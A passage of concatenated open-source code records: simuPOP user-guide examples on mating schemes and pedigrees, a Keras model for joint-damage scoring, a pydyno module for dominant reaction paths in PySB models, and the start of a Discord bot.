postOps=sim.Dumper(structure=False, max=5),\n gen = 1\n)\n#end_file\n\n#begin_file log/controlledOffGenerator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef traj(gen):\n return [0.5 + gen * 0.01]\n\npop = sim.Population(1000, loci=[10]*2)\n# evolve the sim.Population while keeping allele frequency 0.5\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.HomoMating(sim.RandomParentChooser(),\n sim.ControlledOffspringGenerator(loci=5,\n alleles=[0], freqFunc=traj,\n ops = sim.SelfingGenoTransmitter())),\n postOps=[\n sim.Stat(alleleFreq=[5, 15]),\n sim.PyEval(r'\"%.2f\\t%.2f\\n\" % (alleleFreq[5][0], alleleFreq[15][0])')\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/sexSpecificRec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nfrom simuPOP import *\n#begin_ignore\nsetRNG(seed=12345)\n#end_ignore\nclass sexSpecificRecombinator(PyOperator):\n def __init__(self, intensity=0, rates=0, loci=[], convMode=NO_CONVERSION,\n maleIntensity=0, maleRates=0, maleLoci=[], maleConvMode=NO_CONVERSION,\n *args, **kwargs):\n # This operator is used to recombine maternal chromosomes\n self.Recombinator = Recombinator(rates, intensity, loci, convMode)\n # This operator is used to recombine paternal chromosomes\n self.maleRecombinator = Recombinator(maleRates, maleIntensity,\n maleLoci, maleConvMode)\n #\n PyOperator.__init__(self, func=self.transmitGenotype, *args, **kwargs)\n #\n def transmitGenotype(self, pop, off, dad, mom):\n # Form the first homologous copy of offspring.\n self.Recombinator.transmitGenotype(mom, off, 0)\n # Form the second homologous copy of offspring.\n self.maleRecombinator.transmitGenotype(dad, off, 1)\n return True\n\npop = Population(10, loci=[15]*2, infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n initOps=[\n InitSex(),\n InitGenotype(freq=[0.4] + [0.2]*3)\n ],\n matingScheme=RandomMating(ops=[\n sexSpecificRecombinator(rates=0.1, maleRates=0),\n ParentsTagger()\n ]),\n postOps=Dumper(structure=False),\n gen = 2\n)\n#end_file\n\n\n#begin_file log/generator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef func():\n i = 1\n all = 0\n while i <= 5:\n all += 1./i\n i += 1\n yield all \n\nfor i in func():\n print('%.3f' % i)\n\n#end_file\n\n#begin_file log/PyParentsChooser.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom random import randint\ndef randomChooser(pop, subPop):\n males = []\n females = []\n # identify males and females in each social rank\n for rank in range(3):\n males.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.MALE and x.rank == rank])\n females.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.FEMALE and x.rank == rank])\n #\n while True:\n # choose a rank randomly\n rank = int(pop.individual(randint(0, pop.subPopSize(subPop) - 1), subPop).rank)\n yield males[rank][randint(0, len(males[rank]) - 1)], \\\n females[rank][randint(0, len(females[rank]) - 1)]\n\ndef setRank(rank):\n 'The rank of offspring can increase or drop to zero randomly'\n # only use rank of the father\n return (rank[0] + randint(-1, 1)) % 3\n\npop = sim.Population(size=[1000, 2000], loci=1, infoFields='rank')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitInfo(lambda : randint(0, 2), infoFields='rank')\n ],\n matingScheme=sim.HomoMating(\n sim.PyParentsChooser(randomChooser),\n sim.OffspringGenerator(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(setRank),\n ])\n ),\n gen = 5\n) \n#end_file\n\n\n#begin_file log/BuiltInParentsChooser.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom random import randint\n\ndef randomChooser(pop, subPop):\n maleChooser = sim.RandomParentChooser(sexChoice=sim.MALE_ONLY)\n maleChooser.initialize(pop, subPop)\n females = []\n # identify females in each social rank\n for rank in range(3):\n females.append([x for x in pop.individuals(subPop) \\\n if x.sex() == sim.FEMALE and x.rank == rank])\n #\n while True:\n # choose a random male\n m = maleChooser.chooseParents()[0]\n rank = int(m.rank)\n # find a female in the same rank\n yield m, females[rank][randint(0, len(females[rank]) - 1)]\n\ndef setRank(rank):\n 'The rank of offspring can increase or drop to zero randomly'\n # only use rank of the father\n return (rank[0] + randint(-1, 1)) % 3\n\npop = sim.Population(size=[1000, 2000], loci=1, infoFields='rank')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitInfo(lambda : randint(0, 2), infoFields='rank')\n ],\n matingScheme=sim.HomoMating(\n sim.PyParentsChooser(randomChooser),\n sim.OffspringGenerator(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(setRank),\n ])\n ),\n gen = 5\n) \n#end_file\n\n\n\n#begin_file log/cppParentChooser.py\n#expect_error because some system does not have swig or vc to compile\n#begin_ignore\nclassFile = open('log/myParentsChooser.h', 'w')\nclassFile.write('''#include \n#include \n#include \nusing std::pair;\nusing std::vector;\nclass myParentsChooser\n{\npublic:\n // A constructor takes all locations of male and female.\n myParentsChooser(const std::vector & m, const std::vector & f)\n : male_idx(m), female_idx(f)\n {\n srand(time(0));\n }\n\n pair chooseParents()\n {\n unsigned long male = rand() % male_idx.size();\n unsigned long female = rand() % male_idx.size();\n return std::make_pair(male, female);\n }\nprivate:\n vector male_idx;\n vector female_idx;\n};\n''')\nclassFile.close()\ninterFile = open('log/myParentsChooser.i', 'w')\ninterFile.write('''%module myParentsChooser\n%{\n#include \"myParentsChooser.h\"\n%}\n// std_vector.i for std::vector\n%include \"std_vector.i\"\n%template() std::vector;\n// stl.i for std::pair\n%include \"stl.i\"\n%template() std::pair;\n%include \"myParentsChooser.h\"\n''')\ninterFile.close()\nsetupFile = open('log/setup.py', 'w')\nsetupFile.write('''from distutils.core import setup, Extension\nimport sys\n# Under linux/gcc, lib stdc++ is needed for C++ based extension.\nif sys.platform == 'linux2':\n libs = ['stdc++']\nelse:\n libs = []\nsetup(name = \"myParentsChooser\",\n description = \"A sample parent chooser\",\n py_modules = ['myParentsChooser'], # will be generated by SWIG\n ext_modules = [\n Extension('_myParentsChooser',\n sources = ['myParentsChooser.i'],\n swig_opts = ['-O', '-shadow', '-c++', '-keyword',],\n include_dirs = [\".\"],\n )\n ]\n)\n''')\nsetupFile.close()\nimport os, sys\nsys.path.append('log')\ntry:\n import myParentsChooser\nexcept:\n os.chdir('log')\n os.system('python setup.py build_ext --swig-opts=\"-O -templatereduce -shadow -c++ -keyword -nodefaultctor\" install --install-purelib=\".\" --install-platlib=\".\"')\n os.chdir('..')\n#end_ignore\n\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\n# The class myParentsChooser is defined in module myParentsChooser\ntry:\n from myParentsChooser import myParentsChooser\nexcept ImportError:\n # if failed to import the C++ version, use a Python version\n import random\n class myParentsChooser:\n def __init__(self, maleIndexes, femaleIndexes):\n self.maleIndexes = maleIndexes\n self.femaleIndexes = femaleIndexes\n def chooseParents(self):\n return self.maleIndexes[random.randint(0, len(self.maleIndexes)-1)],\\\n self.femaleIndexes[random.randint(0, len(self.femaleIndexes)-1)]\n\ndef parentsChooser(pop, sp):\n 'How to call a C++ level parents chooser.'\n # create an object with needed information (such as x, y) ...\n pc = myParentsChooser(\n [x for x in range(pop.popSize()) if pop.individual(x).sex() == sim.MALE],\n [x for x in range(pop.popSize()) if pop.individual(x).sex() == sim.FEMALE])\n while True:\n # return indexes of parents repeatedly\n yield pc.chooseParents()\n\npop = sim.Population(100, loci=1)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.HomoMating(sim.PyParentsChooser(parentsChooser),\n sim.OffspringGenerator(ops=sim.MendelianGenoTransmitter())),\n gen = 100\n)\n#end_file\n\n\n\n#begin_file log/ageStructured.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\nN = 10000\npop = sim.Population(N, loci=1, infoFields=['age', 'ind_id', 'father_id', 'mother_id'])\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[20, 50, 75]))\ndef demoModel(gen, pop):\n '''A demographic model that keep a constant supply of new individuals'''\n # number of individuals that will die\n sim.stat(pop, popSize=True, subPops=[(0,3)])\n # individuals that will be kept, plus some new guys.\n return pop.popSize() - pop.dvars().popSize + N / 75\n\ndef pene(geno, age, ind):\n 'Define an age-dependent penetrance function'\n # this disease does not occur in children\n if age < 16:\n return 0\n # if an individual is already affected, keep so\n if ind.affected():\n return 1\n # the probability of getting disease increases with age\n return (0., 0.001*age, 0.001*age)[sum(geno)]\n\ndef outputstat(pop):\n 'Calculate and output statistics'\n sim.stat(pop, popSize=True, numOfAffected=True,\n subPops=[(0, sim.ALL_AVAIL)],\n vars=['popSize_sp', 'propOfAffected_sp'])\n for sp in range(3):\n print('%s: %.3f%% (size %d)' % (pop.subPopName((0,sp)),\n pop.dvars((0,sp)).propOfAffected * 100.,\n pop.dvars((0,sp)).popSize))\n #\n return True\n\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n # random assign age\n sim.InitInfo(lambda: random.randint(0, 75), infoFields='age'),\n # random genotype\n sim.InitGenotype(freq=[0.5, 0.5]),\n # assign an unique ID to everyone.\n sim.IdTagger(),\n sim.PyOutput('Prevalence of disease in each age group:\\n'),\n ],\n # increase the age of everyone by 1 before mating.\n preOps=sim.InfoExec('age += 1'),\n matingScheme=sim.HeteroMating([\n # all individuals with age < 75 will be kept. Note that\n # CloneMating will keep individual sex, affection status and all\n # information fields (by default).\n sim.CloneMating(subPops=[(0,0), (0,1), (0,2)], weight=-1),\n # only individuals with age between 20 and 50 will mate and produce\n # offspring. The age of offspring will be zero.\n sim.RandomMating(ops=[\n sim.IdTagger(), # give new born an ID\n sim.PedigreeTagger(), # track parents of each individual\n sim.MendelianGenoTransmitter(), # transmit genotype\n ],\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 1, 3),\n subPops=[(0,1)]),],\n subPopSize=demoModel),\n # number of individuals?\n postOps=[\n sim.PyPenetrance(func=pene, loci=0),\n sim.PyOperator(func=outputstat, step=20)\n ],\n gen = 200\n)\n\n# draw two Pedigrees from the last age-structured population\nfrom simuPOP import sampling\nsample = sampling.drawNuclearFamilySample(pop, families=2, numOffspring=(2,3),\n affectedParents=(1,2), affectedOffspring=(1,3))\nsim.dump(sample)\n\n#end_file\n\n\n#begin_file log/pedigreeMating.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create a population without any genotype\nfrom simuPOP.utils import migrSteppingStoneRates\nped = sim.Population(size=[1000]*5, ancGen=-1, \n infoFields=['ind_id', 'father_id', 'mother_id', 'migrate_to'])\nped.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n preOps=sim.Migrator(rate=migrSteppingStoneRates(0.1, 5)),\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n # we do not even need a genotype transmitter...\n sim.IdTagger(),\n sim.PedigreeTagger(),\n ]),\n gen=100\n)\n# convert itself to a pedigree object\nped.asPedigree()\n# we should have 100 ancestral generations\nN = ped.ancestralGens()\n# We should have 101 * 1000 * 5 individuals, but how many actually\n# contribute genotype to the last generation?\nanc = ped.identifyAncestors()\nlen(anc)\n# remove individuals who do not contribute genotype to the last generation\nallIDs = [x.ind_id for x in ped.allIndividuals()]\nremovedIDs = list(set(allIDs) - set(anc))\nped.removeIndividuals(IDs=removedIDs)\n# now create a top most population, but we do not need all of them\n# so we record only used individuals\nIDs = [x.ind_id for x in ped.allIndividuals(ancGens=N)]\nsex = [x.sex() for x in ped.allIndividuals(ancGens=N)]\n# create a population, this time with genotype. Note that we do not need\n# populaton structure because PedigreeMating disregard population structure.\npop = sim.Population(size=len(IDs), loci=1000, infoFields='ind_id')\n# manually initialize ID and sex\nsim.initInfo(pop, IDs, infoFields='ind_id')\nsim.initSex(pop, sex=sex)\npop.evolve(\n initOps=sim.InitGenotype(freq=[0.4, 0.6]),\n # we do not need migration, or set number of offspring,\n # or demographic model, but we do need a genotype transmitter\n matingScheme=sim.PedigreeMating(ped, \n ops=sim.MendelianGenoTransmitter()),\n gen=100\n)\n# let us compare the pedigree and the population object\nprint(ped.indInfo('ind_id')[:5])\nprint(pop.indInfo('ind_id')[:5])\nprint([ped.individual(x).sex() for x in range(5)])\nprint([pop.individual(x).sex() for x in range(5)])\nprint(ped.subPopSizes())\nprint(pop.subPopSizes())\n#end_file\n\n\n#begin_file log/pedigreeMatingAgeStructured.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nimport random\nN = 10000\npop = sim.Population(N, infoFields=['age', 'ind_id', 'father_id', 'mother_id'])\n# we simulate age 0, 1, 2, 3 \npop.setVirtualSplitter(sim.InfoSplitter(field='age', values=[0, 1, 2, 3]))\npop.evolve(\n initOps=[\n sim.InitSex(),\n # random assign age\n sim.InitInfo(lambda: random.randint(0, 3), infoFields='age'),\n # random genotype\n sim.InitGenotype(freq=[0.5, 0.5]),\n # assign an unique ID to everyone.\n sim.IdTagger(),\n ],\n # increase the age of everyone by 1 before mating.\n preOps=sim.InfoExec('age += 1'),\n matingScheme=sim.HeteroMating([\n # age 1, 2 will be copied\n sim.CloneMating(\n ops=[\n # This will set offspring ID\n sim.CloneGenoTransmitter(),\n # new ID for offspring in order to track pedigree\n sim.IdTagger(),\n # both offspring and parental IDs will be the same\n sim.PedigreeTagger(output='>>structured.ped'),\n ],\n subPops=[(0,1), (0,2)],\n weight=-1\n ),\n # age 2 produce offspring\n sim.RandomMating(\n ops=[\n # new ID for offspring\n sim.IdTagger(),\n # record complete pedigree\n sim.PedigreeTagger(output='>>structured.ped'),\n sim.MendelianGenoTransmitter(), # transmit genotype\n ],\n subPops=[(0,2)]\n )]\n ),\n gen=20\n)\n\n# use a pedigree object recovered from a file saved by operator PedigreeTagger\nped = sim.loadPedigree('structured.ped')\n# create a top most population, but we do not need all of them\n# so we record only used individuals\nIDs = [x.ind_id for x in ped.allIndividuals(ancGens=ped.ancestralGens())]\nsex = [x.sex() for x in ped.allIndividuals(ancGens=ped.ancestralGens())]\n# create a population, this time with genotype. Note that we do not need\n# populaton structure because PedigreeMating disregard population structure.\npop = sim.Population(size=len(IDs), loci=1000, infoFields='ind_id')\n# manually initialize ID and sex\nsim.initInfo(pop, IDs, infoFields='ind_id')\nsim.initSex(pop, sex=sex)\npop.evolve(\n initOps=sim.InitGenotype(freq=[0.4, 0.6]),\n # we do not need migration, or set number of offspring,\n # or demographic model, but we do need a genotype transmitter\n matingScheme=sim.PedigreeMating(ped, \n ops=sim.IfElse(lambda mom: mom is None,\n sim.CloneGenoTransmitter(),\n sim.MendelianGenoTransmitter())\n ),\n gen=100\n)\n# \nprint(pop.indInfo('ind_id')[:5])\nprint([pop.individual(x).sex() for x in range(5)])\n# The pedigree object does not have population structure\nprint(pop.subPopSizes())\n#begin_ignore\nimport os\nos.remove('structured.ped')\n#end_ignore\n#end_file\n","repo_name":"BoPeng/simuPOP","sub_path":"doc/userGuide.py","file_name":"userGuide.py","file_ext":"py","file_size_in_byte":196042,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"34"} +{"seq_id":"40590987133","text":"import tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom keras_adamw import AdamW\r\n\r\ndef get_feet_model(base_model_joints_loc):\r\n\r\n base_model_joints = keras.models.load_model(base_model_joints_loc, compile = False)\r\n base_model_joints_no_dense = keras.models.Model(base_model_joints.inputs, base_model_joints.layers[-14].output) \r\n base_model_joints_no_dense.trainable = False\r\n\r\n inputs = []\r\n for i in range(6):\r\n inputs.append(keras.layers.Input(shape=(224,224,1)))\r\n outs = []\r\n for i in range(6):\r\n outs.append(base_model_joints_no_dense(inputs[i]))\r\n\r\n pred = keras.layers.Concatenate()(outs)\r\n pred = keras.layers.Dense(1024, activation = \"relu\")(pred)\r\n pred = keras.layers.BatchNormalization()(pred)\r\n pred = keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(512, activation = \"relu\")(pred)\r\n pred = keras.layers.BatchNormalization()(pred)\r\n pred = keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(1)(pred)\r\n\r\n combined_model = keras.models.Model(inputs=inputs, outputs=[pred])\r\n\r\n combined_model.compile(optimizer = _get_optimizer(), loss = \"mean_absolute_error\", metrics = [\"mae\"])\r\n\r\n return combined_model\r\n\r\n\r\ndef get_hand_model(base_model_joints_loc, base_model_wrist_loc, erosion_flag = False):\r\n\r\n individual_model_joints = keras.models.load_model(base_model_joints_loc, compile = False)\r\n individual_model_joints_no_dense = keras.models.Model(individual_model_joints.inputs, individual_model_joints.layers[-14].output) \r\n individual_model_joints_no_dense.trainable = False\r\n individual_model_wrist = keras.models.load_model(base_model_wrist_loc, compile = False)\r\n individual_model_wrist_no_dense = keras.models.Model(individual_model_wrist.inputs, individual_model_wrist.layers[-14].output) \r\n individual_model_wrist_no_dense.trainable = False\r\n\r\n inputs = []\r\n if erosion_flag:\r\n n_joints = 10\r\n else:\r\n n_joints = 9\r\n\r\n for i in range(n_joints + 1):\r\n inputs.append(keras.layers.Input(shape=(224,224,1)))\r\n outs = []\r\n for i in range(n_joints):\r\n outs.append(individual_model_joints_no_dense(inputs[i]))\r\n outs.append(individual_model_wrist_no_dense(inputs[-1]))\r\n\r\n pred = keras.layers.Concatenate()(outs)\r\n pred = keras.layers.Dense(1024, activation = \"relu\")(pred)\r\n pred = keras.layers.BatchNormalization()(pred)\r\n pred = keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(512, activation = \"relu\")(pred)\r\n pred = keras.layers.BatchNormalization()(pred)\r\n pred = keras.layers.Dropout(0.5)(pred)\r\n pred = keras.layers.Dense(1)(pred)\r\n\r\n combined_model = keras.models.Model(inputs=inputs, outputs=[pred])\r\n\r\n combined_model.compile(optimizer = _get_optimizer(), loss = \"mean_absolute_error\", metrics = [\"mae\"])\r\n\r\n return combined_model\r\n\r\n\r\ndef _get_optimizer():\r\n\r\n # lr_decayed_fn = (\r\n # tf.keras.experimental.CosineDecay(initial_learning_rate = 3e-4,\r\n # decay_steps = 100*40,\r\n # alpha=1/3))\r\n\r\n # return keras.optimizers.SGD(learning_rate=lr_decayed_fn, momentum=0.9)\r\n\r\n return keras.optimizers.Adam()\r\n\r\ndef _get_adamW(model, epochs, steps):\r\n wd = 1e-6\r\n weight_decays = {}\r\n # Only layers with \"kernel\" need wd applied and don't apply WD to the output layer\r\n for layer in model.layers:\r\n if hasattr(layer, 'kernel'):\r\n layer.kernel_regularizer = keras.regularizers.l2(0)\r\n weight_decays.update({layer.kernel.name: wd})\r\n lr_multipliers = {'conv':0.2} \r\n optimizer = AdamW(lr = 3e-4, lr_multipliers = lr_multipliers, weight_decays = weight_decays, use_cosine_annealing = True, total_iterations = epochs * steps, init_verbose = False, batch_size = 1)\r\n return optimizer","repo_name":"ChenfuShi/RA2_alpine_lads","sub_path":"ra_joint_predictions/model/combined_sc1_model.py","file_name":"combined_sc1_model.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13848317164","text":"import re\nfrom functools import partial\nfrom concurrent.futures import ProcessPoolExecutor\nfrom pydyno.discretization.base import DomPath, _dominant_paths, _reencode_signatures_paths\nimport numpy as np\nimport networkx as nx\nfrom pysb.bng import generate_equations\nfrom pysb import Parameter\nfrom pysb.simulator.scipyode import SerialExecutor\nimport pandas as pd\nimport sympy\nimport pydyno.util as hf\nfrom pydyno.seqanalysis import SeqAnalysis\nfrom tqdm import tqdm\n\n\nclass PysbDomPath(DomPath):\n \"\"\"\n Obtain dominant paths from models encoded in the PySB format.\n\n Parameters\n ----------\n model: PySB model\n Model to analyze\n simulations: PySB SimulationResult object or str\n Simulations used to perform the analysis. If str it should be the\n filepath to a pysb simulation result in hdf5 format\n\n Examples\n --------\n Obtain the discretized trajectory of the extrinsic apoptosis reaction model\n\n >>> from pydyno.discretization import PysbDomPath\n >>> from pydyno.examples.earm.earm2_flat import model\n >>> from pysb.simulator import ScipyOdeSimulator\n >>> import numpy as np\n >>> tspan = np.linspace(0, 20000, 100)\n >>> # Simulate model\n >>> sim = ScipyOdeSimulator(model, tspan).run()\n >>> # Obtain dominant paths that consume species 37\n >>> dp = PysbDomPath(model=model, simulations=sim)\n >>> signs, paths = dp.get_path_signatures(target='s37', type_analysis='consumption', depth=5, dom_om=1)\n >>> print(signs.sequences.iloc[:, :5]) \\\n #doctest: +NORMALIZE_WHITESPACE\n\t\t 202.020203 404.040405 606.060608 808.080811 1010.101013\n seq_idx\tcount\n 0\t 1\t 8\t 8\t 8\t 8\t 8\n\n For further information on retrieving sequences from the ``SeqAnalysis``\n object returned by :func:`get_path_signatures`, see the examples under the\n :class:`pydyno.seqanalysis.SeqAnalysis` class.\n \"\"\"\n\n def __init__(self, model, simulations):\n super().__init__(model)\n self._trajectories, self._parameters, self._nsims, self._tspan = hf.get_simulations(simulations)\n self._par_name_idx = {j.name: i for i, j in enumerate(self.model.parameters)}\n generate_equations(self.model)\n\n @property\n def trajectories(self):\n return self._trajectories\n\n @property\n def parameters(self):\n return self._parameters\n\n @property\n def nsims(self):\n return self._nsims\n\n @property\n def tspan(self):\n return self._tspan\n\n @property\n def par_name_idx(self):\n return self._par_name_idx\n\n def create_bipartite_graph(self):\n \"\"\"\n Create bipartite graph with species and reaction nodes of the pysb model\n\n Returns\n -------\n nx.DiGraph\n a NetworkX directed graph\n \"\"\"\n graph = nx.DiGraph(name=self.model.name)\n for i, cp in enumerate(self.model.species):\n species_node = 's%d' % i\n slabel = re.sub(r'% ', r'%\\\\l', str(cp))\n slabel += '\\\\l'\n graph.add_node(species_node,\n label=slabel)\n for i, reaction in enumerate(self.model.reactions_bidirectional):\n reaction_node = 'r%d' % i\n graph.add_node(reaction_node,\n label=reaction_node)\n reactants = set(reaction['reactants'])\n products = set(reaction['products'])\n modifiers = reactants & products\n reactants = reactants - modifiers\n products = products - modifiers\n attr_reversible = {'dir': 'both', 'arrowtail': 'empty'} if reaction['reversible'] else {}\n for s in reactants:\n self.r_link(graph, s, i, **attr_reversible)\n for s in products:\n self.r_link(graph, s, i, _flip=True, **attr_reversible)\n for s in modifiers:\n self.r_link(graph, s, i, _flip=True, arrowhead=\"odiamond\")\n return graph\n\n @staticmethod\n def r_link(graph, s, r, **attrs):\n nodes = ('s%d' % s, 'r%d' % r)\n if attrs.get('_flip'):\n del attrs['_flip']\n nodes = reversed(nodes)\n attrs.setdefault('arrowhead', 'normal')\n graph.add_edge(*nodes, **attrs)\n\n def get_path_signatures(self, target, type_analysis, depth, dom_om,\n num_processors=1, sample_simulations=None):\n \"\"\"\n Obtain the dominant paths\n\n Parameters\n ----------\n target: str\n Species target. It has to be in a format `s1` where the number\n represents the species index\n type_analysis: str\n Type of analysis to perform. It can be `production` or `consumption`\n depth: int\n Depth of the traceback starting from the target species\n dom_om: float\n Order of magnitude to consider dominancy\n num_processors: int\n Number of cores to use in the function\n sample_simulations: int\n Number of simulations to use for the analysis\n\n Returns\n -------\n pydyno.SeqAnalysis\n Sequences of the discretized signatures\n \"\"\"\n if sample_simulations:\n if isinstance(sample_simulations, int):\n nsims = range(sample_simulations)\n elif isinstance(sample_simulations, list):\n nsims = sample_simulations\n else:\n raise TypeError('Sample method not supported')\n else:\n nsims = range(self.nsims)\n\n network = self.create_bipartite_graph()\n\n dom_path_partial = partial(dominant_paths_pysb, param_idx_dict=self.par_name_idx,\n reactions_bidirectional=self.model.reactions_bidirectional, tspan=self.tspan,\n network=network, target=target, type_analysis=type_analysis,\n depth=depth, dom_om=dom_om)\n\n pbar = tqdm(total=len(self.parameters))\n\n def update(*a):\n pbar.update()\n\n with SerialExecutor() if num_processors == 1 else \\\n ProcessPoolExecutor(max_workers=num_processors) as executor:\n results = []\n for args in zip(self.trajectories, self.parameters):\n f = executor.submit(dom_path_partial, *args)\n f.add_done_callback(update)\n results.append(f)\n\n try:\n signatures_labels = [r.result() for r in results]\n finally:\n for r in results:\n r.cancel()\n\n signatures = [0] * len(nsims)\n labels = [0] * len(nsims)\n for idx, sl in enumerate(signatures_labels):\n signatures[idx] = sl[0]\n labels[idx] = sl[1]\n signatures_df, new_paths = _reencode_signatures_paths(signatures, labels, self.tspan)\n # signatures_labels = {'signatures': signatures, 'labels': all_labels}\n return SeqAnalysis(signatures_df, target), new_paths\n\n\ndef _calculate_pysb_expression(expr, trajectories, parameters, param_idx_dict):\n \"\"\"Obtains simulated values of a pysb expression\"\"\"\n expanded_expr = expr.expand_expr(expand_observables=True)\n expr_variables = [atom for atom in expanded_expr.atoms(sympy.Symbol)]\n args = [0] * len(expr_variables)\n for idx2, va in enumerate(expr_variables):\n # Getting species index\n if str(va).startswith('__'):\n sp_idx = int(''.join(filter(str.isdigit, str(va))))\n args[idx2] = trajectories[:, :, sp_idx]\n else:\n par_values = parameters[:, param_idx_dict[va.name]]\n args[idx2] = par_values.reshape((len(par_values), 1))\n\n func = sympy.lambdify(expr_variables, expanded_expr, modules='numpy')\n expr_value = func(*args)\n\n return expr_value\n\n\ndef calculate_reaction_rate(rate_react, trajectories, parameters, param_idx_dict,\n changed_parameters=None, time_change=None):\n \"\"\"\n Get reaction rate values from simulated trajectories\n\n Parameters\n ----------\n rate_react\n trajectories\n parameters\n param_idx_dict\n\n Returns\n -------\n\n \"\"\"\n variables = [atom for atom in rate_react.atoms(sympy.Symbol)]\n args = [0] * len(variables) # arguments to put in the lambdify function\n for idx2, va in enumerate(variables):\n # Getting species index\n if str(va).startswith('__'):\n sp_idx = int(''.join(filter(str.isdigit, str(va))))\n args[idx2] = trajectories[:, :time_change, sp_idx]\n elif isinstance(va, Parameter):\n par_values = parameters[:, param_idx_dict[va.name]]\n args[idx2] = par_values.reshape((len(par_values), 1))\n else:\n # Calculate expressions\n args[idx2] = _calculate_pysb_expression(va, trajectories[:, :time_change, :], parameters, param_idx_dict)\n\n func = sympy.lambdify(variables, rate_react, modules=dict(sqrt=np.lib.scimath.sqrt))\n react_rate = func(*args)\n\n if changed_parameters is not None and time_change is not None:\n args = [0] * len(variables) # arguments to put in the lambdify function\n for idx2, va in enumerate(variables):\n # Getting species index\n if str(va).startswith('__'):\n sp_idx = int(''.join(filter(str.isdigit, str(va))))\n args[idx2] = trajectories[:, time_change:, sp_idx]\n elif isinstance(va, Parameter):\n par_values = changed_parameters[:, param_idx_dict[va.name]]\n args[idx2] = par_values.reshape((len(par_values), 1))\n else:\n # Calculate expressions\n args[idx2] = _calculate_pysb_expression(va, trajectories[:, time_change:, :], changed_parameters,\n param_idx_dict)\n\n func = sympy.lambdify(variables, rate_react, modules=dict(sqrt=np.lib.scimath.sqrt))\n react_rate2 = func(*args)\n react_rate = np.concatenate((react_rate, react_rate2), axis=1)\n\n return react_rate\n\n\ndef pysb_reaction_flux_df(reactions_bidirectional, trajectories, parameters, param_idx_dict, tspan):\n \"\"\"\n Create a pandas DataFrame with the reaction rates values at each time point\n\n Parameters\n ----------\n reactions_bidirectional:\n PySB bidirectional reactions\n trajectories: np.ndarray\n Simulated trajectories\n parameters: np.ndarray\n Parameters used to obtain the simulations\n tspan: np.ndarray\n Time span used in the simulations\n\n Returns\n -------\n pandas.DataFrame\n Dataframe with the reaction rate values of the simulations\n \"\"\"\n\n rxns_names = ['r{0}'.format(rxn) for rxn in range(len(reactions_bidirectional))]\n rxns_df = pd.DataFrame(columns=tspan, index=rxns_names)\n\n for idx, reac in enumerate(reactions_bidirectional):\n react_rate = calculate_reaction_rate(reac['rate'], trajectories, parameters, param_idx_dict)\n rxns_df.loc['r{0}'.format(idx)] = react_rate\n rxns_df['Total'] = rxns_df.sum(axis=1)\n return rxns_df\n\n\ndef dominant_paths_pysb(trajectories, parameters, param_idx_dict, reactions_bidirectional, tspan,\n type_analysis, network, target, depth, dom_om):\n rxns_df = pysb_reaction_flux_df(reactions_bidirectional, trajectories[np.newaxis, :, :], parameters[np.newaxis, :],\n param_idx_dict, tspan)\n dom_paths = _dominant_paths(rxns_df, network, tspan, target, type_analysis, depth, dom_om)\n return dom_paths\n","repo_name":"LoLab-MSM/pydyno","sub_path":"pydyno/discretization/pysb_discretize.py","file_name":"pysb_discretize.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"16512146113","text":"# Work with Python 3.8\nimport asyncio\nimport discord\nimport random\nimport requests\nimport datetime\nimport openpyxl\nfrom discord.ext import commands\nimport os\n\nintents = discord.Intents.all()\ngame = discord.Game(\"^^도움말을 